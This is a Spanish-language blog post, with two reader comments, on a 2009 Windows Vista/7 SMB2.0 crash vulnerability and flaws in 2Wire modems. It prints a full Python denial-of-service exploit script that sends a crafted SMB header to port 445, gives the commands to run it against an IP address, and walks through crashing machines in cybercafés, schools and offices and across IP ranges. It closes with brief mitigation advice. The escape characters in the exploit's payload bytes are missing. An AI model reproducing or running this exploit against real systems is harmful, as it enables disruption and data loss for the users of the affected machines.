Los problemas de seguridad en Windows son el pan de cada día de sus usuarios, es por ello que las actualizaciones de seguridad deben ser instaladas
La siguiente información sobre los problemas de seguridad es mostrada sólo para fines educativos, el uso inapropiado de ésta información corre bajo la responsabilidad del lector.
Éste documento va dirigido a escuelas, ciber-¿cafés? y lugares dónde comparten su conexión de Internet, los usuarios caseros están en un nivel de riesgo un poco más bajo.
Para Windows Vista, Server 2008 < R2, 7 RC existe una grave vulnerabilidad de SMB2.0, la nueva versión de SMB que está por defecto en los productos de Windows antes mencionados (Windows Vista debe tener la actualizacion KB942624 (MS07-063)).
– Fecha: 7 de septiembre de 2009
– Descubierto por: Laurent Gaffié.
– Peligro: Alto.
El fallo consiste en enviar un encabezado SMB especialmente diseñado lo cual genera la clásica pantalla azul que los que hemos usado Windows 98 estábamos tan acostumbrados.
Mientras que por el lado del módem 2Wire, existen 2 fallos se seguridad que permiten tanto reiniciar el modem, como sobre-escribir la contraseña del módem, ambos desde cualquier computadora conectada a la red.
¿Cómo sé si estoy expuesto?
Si usas un módem 2wire, tienes problemas de seguridad, visita las siguientes direcciones:
#!/usr/bin/python #When SMB2.0 recieve a “&” char in the “Process Id High” SMB header field #it dies with a PAGE_FAULT_IN_NONPAGED_AREA error from socket import socket from time import sleep import sys print “n~> SMBv2.0 Overflow de Negociacao” if len(sys.argv)!=2: print “~> Erro – Uso: %s ” % sys.argv[0] sys.exit(0) host = sys.argv[1], 445 buff = ( “x00x00x00x90″ # Begin SMB header: Session message “xffx53x4dx42″ # Server Component: SMB “x72x00x00x00″ # Negociate Protocol “x00x18x53xc8″ # Operation 0×18 & sub 0xc853 “x00x26″# Process ID High: –> normal value should be “x00x00″ “x00x00x00x00x00x00x00x00x00x00xffxffxffxfe” “x00x00x00x00x00x6dx00x02x50x43x20x4ex45x54″ “x57x4fx52x4bx20x50x52x4fx47x52x41x4dx20x31″ “x2ex30x00x02x4cx41x4ex4dx41x4ex31x2ex30x00″ “x02x57x69x6ex64x6fx77x73x20x66x6fx72x20x57″ “x6fx72x6bx67x72x6fx75x70x73x20x33x2ex31x61″ “x00x02x4cx4dx31x2ex32x58x30x30x32x00x02x4c” “x41x4ex4dx41x4ex32x2ex31x00x02x4ex54x20x4c” “x4dx20x30x2ex31x32x00x02x53x4dx42x20x32x2e” “x30x30x32x00″ ) s = socket() s.connect(host) s.send(buff) s.close()
ping 192.168.1.75
python vista.py 192.168.1.75
Exploit SMB2 en Windows Vista
https://www.youtube.com/watch?feature=player_embedded&v=btH36ewsCx4
¿Qué impacto tiene?
Si tienes un ciber por ejemplo, alguna persona puede rentar una computadora con lo cual será parte de la red, con sólo abrir el navegador e ingresar la dirección arriba expuesta, puede reiniciar el módem desconectando a todos al momento, esperar a que se realice la conexión a internet y volver a desconectar cuantas veces deseé.
Así como escribir scripts que pueda reiniciar el módem constantemente.
Además, si sobre-escribe la contraseña, puede abrir puertos, deshabilitar la conexión inalámbrica, disminuir o aumentar su señal entre otras cosas.
Además de poder ver la IP de todas las computadoras que están conectadas a la red.
Si éstas computadoras tienen Windows Vista, puede proceder a correr el script desde la misma máquina y comenzar a bloquear computadora por computadora.
El administrador normalmente pensará que se trata de virus con lo que (lo más seguro) procederá a formatear y reinstalar las computadoras afectadas, teniendo una disminución de productividad, menor ingreso y una gran molestia entré él mismo y los usuarios.
En una escuela, se puede escanear computadoras que se encuentren conectadas a la institución y bloquearlas.
Imagina la exposición de un alumno, o de un profesor y de repente muestra la pantalla azul, reinicia, y cuando se sientan aburridos.. otra pantalla azul.
En un ámbito de trabajo todo empeora, pues al momento de bloquear las computadoras se pierde todo el trabajo no guardado.
Además, se puede barrer un rango de ip’s haciendo que diversos usuarios ya sea caseros, de trabajo o servidores reciban el ataque, perdiendo sus datos no guardados en cualquier parte del mundo (¿el regreso del ping de la muerte?).
¿Qué hago entonces?
Si eres usuario de Telmex u otra compañía que te ofrece un módem 2wire, exige otra marca, telmex está ahora distribuyendo modems Thompson,
Si eres usuario de Windows Vista, bloquea el puerto 445, o mejor aún, para no tener tantos problemas de seguridad ¡Pásate a GNU/Linux!
2 Comentarios
Anonymous · 11 abril, 2010 a las 00:31
Aparte tomas info de otros lados y no das credito. Hasta crees que si haces eso en un ambiente laboral no te van a cachar, en un ciber cafe con ver quien fue al que no se le pasmo windows ya caiste, LOL.
Angelinux Slack · 11 abril, 2010 a las 00:42
Si fueras tan amable de indicarme que información no he dado su respectivo crédito, te lo agradecería.
Y la vulnerabilidad podía (ya muchas máquinas tienen parche) ser explotada desde cualquier sistema operativo.
Y lo del ciber café, todos los Windows se “Wpasmarían” si te refieres al exploit SMB, y en caso de que te refieras a la vulnerabilidad del modem, es independiente al sistema operativo.
NaCL-u2